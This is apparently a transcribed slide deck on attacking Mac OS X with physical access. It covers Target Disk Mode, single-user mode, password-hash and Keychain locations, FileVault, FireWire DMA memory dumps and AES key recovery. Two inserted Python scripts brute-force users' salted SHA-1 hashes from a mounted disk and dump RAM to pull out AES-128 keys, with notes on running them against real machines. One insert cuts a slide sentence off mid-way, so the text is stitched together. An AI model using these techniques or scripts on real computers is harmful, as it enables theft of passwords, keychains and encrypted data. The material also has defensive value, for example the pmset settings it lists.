
Hack Mac OS X
Tips and tricks for Mac OS X hack

Summary
Introduction
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion

Introduction

Market share: Mac vs Windows (chart)
Market share by continent (chart)

Mac OS X history
1996: Apple purchases NeXT and the NeXTSTEP OS
1996: Steve Jobs returns to Apple (he had left in 1985)
1999: First version of Mac OS X Server (1.0)
2001: First version of Mac OS X for workstations (10.0 Cheetah)
2006: First Mac(Book) with an Intel processor instead of PowerPC

Mac OS X architecture
UNIX system
Based on the Darwin OS (hybrid kernel XNU)
The XNU kernel is based on the NeXTSTEP micro-kernel (Mach) and on the BSD kernel (FreeBSD)
But Darwin does not contain the graphics engine "Quartz"

Architecture diagram (layers, bottom to top):
Hardware: EFI
Kernel space, Darwin: Mach, BSD, I/O Kit, Platform Expert
User space, OS X: launchd, Login Window, Core services, Application services, Quartz/Aqua, Mac interfaces, Finder/Dock, Applications

Exploitation of target mode

About target mode
During startup, press "T"
Access is not protected by default
Full access to the file system of the disk through a file manager

Alternatives
Single-user mode (press "Apple + S")
From a live OS on a USB/CD device: press "Alt"
From the Mac OS X installation DVD: press "C" and select Reset Password from the installer

Identify system users
User UIDs in /private/var/db/dslocal/indices/Default/index
User privileges in /var/db/dslocal/nodes/Default/groups/admin.plist

Identify system passwords
Password hashes in /var/db/shadow/hash
Find the clear password with a brute force attack (JTR, John the Ripper)

About the Keychain file
The Keychain file stores secret data like: Safari passwords, WiFi keys, Skype username/password, Google username/password (contacts, Picasa), Exchange username/password, ...

Open Keychain files
For each user, the Keychain is stored in /Users/<USER>/Library/Keychains/login.keychain
Keychain files are protected by the keychain password
It's possible to import any Keychain file without knowing the Keychain password
But you have to know the "keychain" password to exploit it :(
By default, the "keychain" password is equal to the user's system password :-)
You can identify the password in volatile data (RAM)
You can attempt to identify the password by brute force attack

About FileVault encryption
Encryption of the file system, like BitLocker or DM-Crypt
Full disk encryption from the Lion version
Only home directory encryption for previous versions
Native function since Mac OS X 10.3
".dmg" images can use FileVault encryption
Home directory without encryption vs. home directory with FileVault encryption (figure)

Open FileVault file
The FileVault file is stored in /Users/<USER>/test.sparsebundle
FileVault files are protected by a password ... and it's the same as the <USER> system password :-)
So from target mode it's easy to decrypt this file
You can identify the AES key in volatile data (RAM) ...
Else, without access to the password hashes, it is possible to attempt to find the password by brute force attack

Exploitation of physical memory

Physical memory dump
From root access, MacMemoryReader can dump RAM
MMR creates a temporary kernel extension to read the /dev/mem device
The sleepimage file (/var/vm/sleepimage) contains a physical memory dump for safe sleep (hibernation mode)
From full disk access, the "sleepimage" file can be viewed
From recent versions, the file is encrypted
Configuration of the encryption of "sleepimage" (root privileges needed to modify it)
Physical extraction ...
+ Tools to extract RAM > http://www.mcgrewsecurity.com

DMA access
From DMA access, a RAM dump is possible and EASY
The "pythonraw1394" libraries allow to dump the RAM of a Windows system from Linux (2006 - Adam Boileau - Winlockpwn)
The "libforensic1394" library (Freddie Witherden) allows to dump the RAM of Mac OS X from OS X or Linux

DMA access - PoC
Using the "libforensic1394" library is very easy :-) and allows to write code to dump RAM ...

Exploit DMA access
DEMO

Identify secret data
Identify the current username for a locked session (opened without auto-login)
Identify the password for a locked session (opened without auto-login)
Identify the current username for a locked session (opened with auto-login)
Identify the current password for a locked session (opened with auto-login)
Identify just the username for a locked session after startup
A lot of other secret data is in physical memory, like: Email / Calendar data, Office document data, Web passwords, Software passwords, Keychain password ...
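Going back to the target-mode section above (identify system users, identify system passwords): the following script is an added example, not part of the original deck, of what an attacker does once the disk is mounted. It walks the dslocal node for the local users, marks which ones are listed in admin.plist, extracts the salted SHA-1 from each user's /var/db/shadow/hash record and tries a small wordlist against it (the same attack JTR's "xsha" format automates). Assumptions: the plist attribute names ("name", "uid", "generateduid", "users"), and the record layout (salted SHA-1 as 48 hex characters at offset 168 of a 1240-character record, the Mac OS X 10.4-10.6 format; from 10.7 the hash moves into the user plist as ShadowHashData). The sample volume is constructed in a temporary directory so the script runs offline.

```python
"""Post-exploitation of a volume mounted via target mode (added example)."""
import hashlib
import os
import plistlib
import tempfile

DSLOCAL = "var/db/dslocal/nodes/Default"
SHADOW = "var/db/shadow/hash"
# Assumed 10.4-10.6 record layout: 8 hex chars of salt + 40 hex chars of SHA-1 at offset 168
SHA1_OFFSET, SHA1_LEN = 168, 48


def list_users(root):
    """Return {name: (uid, generateduid)} from the dslocal user plists."""
    users = {}
    udir = os.path.join(root, DSLOCAL, "users")
    for fn in os.listdir(udir):
        if not fn.endswith(".plist"):
            continue
        with open(os.path.join(udir, fn), "rb") as f:
            p = plistlib.load(f)
        # dslocal stores every attribute as a list of strings
        users[p["name"][0]] = (int(p["uid"][0]), p["generateduid"][0])
    return users


def admin_users(root):
    """Names listed in the admin group ('users' attribute of admin.plist)."""
    with open(os.path.join(root, DSLOCAL, "groups", "admin.plist"), "rb") as f:
        return set(plistlib.load(f).get("users", []))


def salted_sha1(root, generateduid):
    """Return (salt, digest) from the user's shadow hash record (file named by GeneratedUID)."""
    with open(os.path.join(root, SHADOW, generateduid)) as f:
        rec = f.read().strip()
    field = bytes.fromhex(rec[SHA1_OFFSET:SHA1_OFFSET + SHA1_LEN])
    return field[:4], field[4:]


def crack(salt, digest, wordlist):
    """Brute force: find pw with SHA-1(salt || pw) == digest, else None."""
    for pw in wordlist:
        if hashlib.sha1(salt + pw.encode()).digest() == digest:
            return pw
    return None


def audit(root, wordlist):
    """{name: {uid, admin, password}} for every local user on the mounted volume."""
    admins = admin_users(root)
    out = {}
    for name, (uid, guid) in list_users(root).items():
        salt, digest = salted_sha1(root, guid)
        out[name] = {"uid": uid, "admin": name in admins,
                     "password": crack(salt, digest, wordlist)}
    return out


def build_sample_volume(users):
    """Constructed sample volume: users = {name: (uid, is_admin, password)}."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, DSLOCAL, "users"))
    os.makedirs(os.path.join(root, DSLOCAL, "groups"))
    os.makedirs(os.path.join(root, SHADOW))
    admins = []
    for name, (uid, is_admin, password) in users.items():
        guid = "%08X-0000-0000-0000-%012X" % (uid, uid)
        with open(os.path.join(root, DSLOCAL, "users", name + ".plist"), "wb") as f:
            plistlib.dump({"name": [name], "uid": [str(uid)], "generateduid": [guid]}, f)
        salt = bytes([uid & 0xFF, 0x11, 0x22, 0x33])
        rec = "0" * SHA1_OFFSET + salt.hex() + hashlib.sha1(salt + password.encode()).hexdigest()
        rec += "0" * (1240 - len(rec))  # real records are 1240 hex characters
        with open(os.path.join(root, SHADOW, guid), "w") as f:
            f.write(rec)
        if is_admin:
            admins.append(name)
    with open(os.path.join(root, DSLOCAL, "groups", "admin.plist"), "wb") as f:
        plistlib.dump({"name": ["admin"], "gid": ["80"], "users": admins}, f)
    return root


if __name__ == "__main__":
    vol = build_sample_volume({"alice": (501, True, "letmein"),
                               "bob": (502, False, "hunter2")})
    for user, info in audit(vol, ["password", "letmein", "123456"]).items():
        print(user, info)
```

On a real target-mode mount, pass the mount point (for example /Volumes/Macintosh HD) as `root` and a proper wordlist; the same salt-plus-password construction is what makes these hashes cheap to brute force compared with an iterated KDF.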
The AES-128 key used for FileVault encryption can be found in physical memory and allows to:
Decrypt encrypted home directories and fully encrypted disks (Lion version)
Identify secret data on the hard disk (like system passwords)
Unlock the system
The AESKeyfind tool can extract AES keys
Passware Kit 11.3 can extract and exploit the found keys
PoC to identify web and software passwords
PoC to identify Mac OS X passwords
Is it possible to extract secret data by DMA access when full encryption is activated (Lion version)?
YES! but NO if:
The system is not started (pre-boot authentication screen)
The system is hibernated with power removed from RAM (hibernatemode=25)
and the parameter to remove the FileVault keys from RAM is activated (destroyfvkeyonstandby=1)

Writing physical memory
... to bypass the session password with the "libforensic1394" library! but ... it doesn't work :-(
The Inception tool (breaknenter.org) will
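For the DMA PoC and the AES key recovery described in the physical-memory sections above, here is an added example (not the deck's own code and not aeskeyfind's). It reads RAM through a `read_fn(addr, nbytes)` callable so that the same code runs against a libforensic1394 device or, as here, against a constructed in-memory image; then it slides a 16-byte window over the dump and reports every window that is followed by its own AES-128 key schedule, which is how a key left in a cipher context by FileVault (or any AES user) betrays itself. The libforensic1394 calls shown in the comment (`Bus`, `enable_sbp2`, `devices`, `Device.open`, `Device.read`) are assumed from that library's Python binding; the RAM image, the key position and the filler are constructed for the example.

```python
"""DMA dump plus AES-128 key-schedule search over the dump (added example)."""
import random

RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def _rotl8(x, s):
    return ((x << s) | (x >> (8 - s))) & 0xFF


def _make_sbox():
    """Build the AES S-box from GF(2^8) arithmetic instead of a 256-entry table."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF         # q /= 3, so q = 1/p
        if q & 0x80:
            q ^= 0x09
        x = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4)
        sbox[p] = x ^ 0x63                                       # affine transform
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _make_sbox()


def expand_key(key):
    """AES-128 key schedule: 16-byte key -> 176-byte expanded key (FIPS-197)."""
    w = bytearray(key)
    for i in range(4, 44):
        t = w[(i - 1) * 4:i * 4]
        if i % 4 == 0:
            t = bytes(SBOX[b] for b in t[1:] + t[:1])           # SubWord(RotWord)
            t = bytes([t[0] ^ RCON[i // 4 - 1]]) + t[1:]
        w += bytes(a ^ b for a, b in zip(w[(i - 4) * 4:(i - 3) * 4], t))
    return bytes(w)


def _word4(cand):
    """Only the 5th schedule word: a cheap pre-check before a full expansion."""
    t = cand[13:16] + cand[12:13]
    return bytes(SBOX[b] ^ c ^ r for b, c, r in zip(t, cand[0:4], (RCON[0], 0, 0, 0)))


def find_aes128_keys(mem, base=0):
    """Return [(address, key)] for every window followed by its own key schedule."""
    found = []
    for off in range(len(mem) - 176 + 1):
        cand = mem[off:off + 16]
        if _word4(cand) != mem[off + 16:off + 20]:
            continue
        if expand_key(cand) == mem[off:off + 176]:
            found.append((base + off, cand))
    return found


def dump_ram(read_fn, start, end, chunk=0x1000):
    """Read [start, end) page by page through read_fn(addr, n) -> bytes.
    Unreadable pages are zero-filled so addresses in the dump stay aligned."""
    out = bytearray()
    for addr in range(start, end, chunk):
        n = min(chunk, end - addr)
        try:
            out += read_fn(addr, n)
        except Exception:            # libforensic1394 raises its own error type
            out += b"\x00" * n
    return bytes(out)


def build_sample_image(key, size=0x4000, key_at=0x1234):
    """Constructed RAM image: random filler, one zero page, one expanded key at key_at."""
    rnd = random.Random(7)
    mem = bytearray(rnd.getrandbits(8) for _ in range(size))
    mem[0:0x800] = b"\x00" * 0x800
    mem[key_at:key_at + 176] = expand_key(key)
    return bytes(mem)


if __name__ == "__main__":
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 sample key
    image = build_sample_image(key)
    ram = dump_ram(lambda a, n: image[a:a + n], 0, len(image))
    print([(hex(a), k.hex()) for a, k in find_aes128_keys(ram)])
    # Against a live target over FireWire (assumed libforensic1394 binding):
    #   from forensic1394 import Bus; bus = Bus(); bus.enable_sbp2(); time.sleep(2)
    #   dev = bus.devices()[0]; dev.open(); ram = dump_ram(dev.read, 0, 1 << 30)
```

The pre-check on the fifth schedule word rejects almost every window for the cost of four S-box lookups, so the full 176-byte comparison only runs on real hits. The two pmset settings quoted on the slide (hibernatemode=25, destroyfvkeyonstandby=1) are exactly what makes this scan fail: with the key schedule wiped from RAM on standby there is nothing for the window to match.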
Details: PDF, 61 pages, English